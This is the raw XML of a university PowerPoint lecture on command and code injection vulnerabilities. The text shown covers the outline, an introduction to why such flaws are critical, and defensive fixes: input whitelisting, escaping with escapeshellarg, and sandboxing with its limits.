            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>There is always a way to avoid to generate code from user input dynamically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183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FC19-F578-4774-AA86-D4D44AD2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B63D68-42AD-42A5-8E88-7658A4AE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35CA0-39CD-4122-9879-63B7BD99AF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If avoiding is not an option, then strongly validate the input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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>whitelists </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>when possible</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Use a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>proper escaping function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i="1" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>escapeshellarg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1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from PHP for example)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77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388F-C959-4A02-B0FF-AC60C8FD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Fixes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6A9194-99A7-4362-966C-F01F33CA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34698-9D8B-47E0-A9E7-3DAC4E8B6A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Another option is to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>use a sandbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Sandboxes are execution environments in which code can be run in a limited environment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For example, without the access to system functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The problem with sandboxes is that it is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>often possible to escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> from them, and even tested ones are not always completely secure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36786724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6934200" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="365E8F"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0F243E"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="0">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="28398" dir="3806097" algn="ctr" rotWithShape="0">
              <a:srgbClr val="243F6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2663624"/>
            <a:ext cx="6934200" cy="1813126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="365F91">
                  <a:alpha val="36000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0066FF">
                  <a:alpha val="68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0">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="28398" dir="3806097" algn="ctr" rotWithShape="0">
              <a:srgbClr val="243F60"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="468000" tIns="360000" rIns="360000" bIns="36000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Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>Command and Code injections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294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4686300"/>
            <a:ext cx="533400" cy="285750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr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56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EA82F60-B719-4839-9466-88EA10CEC9F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6955970" y="64790"/>
            <a:ext cx="2188030" cy="14401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20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000099"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Riccardo BONAFEDE</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"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it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000099"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Università di Padova</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DD7EABF-DC0B-46D2-A175-5397CB782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705694"/>
            <a:ext cx="22105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>
            <a:lvl1pPr marL="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it-IT" sz="1400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000099"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000099"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000099"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>cybersecnatlab.it</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000099"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue Medium"/>
              <a:cs typeface="Helvetica Neue Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15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A44F66C7-1E30-405B-860E-4C6B95704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885" y="2814020"/>
            <a:ext cx="2160037" cy="63831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0EF036E-DA1E-462D-8A3C-007877B109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19" y="3742606"/>
            <a:ext cx="2005733" cy="57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9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6990-7D31-41CE-8ED0-05BE3479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Outline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70550-720E-4296-A137-81FBC8D6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326CC-0F93-4FD8-83AE-10C4FBE77C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 fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Command Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>General Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Output Retrieving</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Code Injections</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>General Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>PHP Code Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Tips and Tricks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Fixes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627568-05BA-41D4-92B1-5BE86AFACDE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579665" y="1698172"/>
            <a:ext cx="4686299" cy="27513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9ABC-D0CA-457C-A381-F53340A3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Introduction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CC5FB7-B252-4569-8A47-B59B4B28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76C66-A01B-4616-B0BD-D197B1BAF0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b="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Code/command execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> is a common flaw that arises when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>unsafe input is interpreted/executed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> by an application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The impact of this vulnerability is often </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>critical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> because it is possible to compromise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> data confidentiality, data integrity, and data availability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48753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9ABC-D0CA-457C-A381-F53340A3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Introduction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CC5FB7-B252-4569-8A47-B59B4B28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76C66-A01B-4616-B0BD-D197B1BAF0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anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Code/command execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> is a common flaw that arises when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>unsafe input is interpreted/executed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> by an application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The impact of this vulnerability is often </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>critical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> because it is possible to compromise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> data confidentiality, data integrity, and data availability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="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61AAA8D-1803-4BED-AF7A-F03C8A8FE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483" y="457480"/>
            <a:ext cx="3191034" cy="41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021C-E4FF-4BBE-A764-178C23B8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Introduction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705B4A-FEEA-4799-81F3-497C9402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264ED-E9D0-44A8-8610-379CBAE0B3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dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Code/Command Injection flaws happen when an application needs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>To use external programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>To execute dynamic code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2982793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 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 Presentation.potx</Template>
  <TotalTime>0</TotalTime>
  <Words>2371</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>363</Paragraphs>
  <Slides>56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Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Helvetica Neue Medium</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Widescreen Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>License &amp; Disclaimer</vt:lpstr>
      <vt:lpstr>Goal</vt:lpstr>
      <vt:lpstr>Prerequisites</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Outline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Outline</vt:lpstr>
      <vt:lpstr>Blind Command Injection</vt:lpstr>
      <vt:lpstr>Blind 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Command Injection</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Code Injection</vt:lpstr>
      <vt:lpstr>Code Injection</vt:lpstr>
      <vt:lpstr>Code Injection</vt:lpstr>
      <vt:lpstr>Code Injection</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>PHP Code Injection</vt:lpstr>
      <vt:lpstr>PHP Code Injection</vt:lpstr>
      <vt:lpstr>PHP Code Injection</vt:lpstr>
      <vt:lpstr>PHP Code Injection</vt:lpstr>
      <vt:lpstr>PHP Code Injection</vt:lpstr>
      <vt:lpstr>PHP Code Injection</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Tips &amp; Tricks</vt:lpstr>
      <vt:lpstr>Tips &amp; Tricks</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Fixes</vt:lpstr>
      <vt:lpstr>Fixes</vt:lpstr>
      <vt:lpstr>Fixes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73</cp:revision>
  <cp:lastPrinted>2019-06-17T08:00:26Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-04-19T20:53:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-02-25T19:18:50Z</dcterms:modified>
</cp:coreProperties>
</file>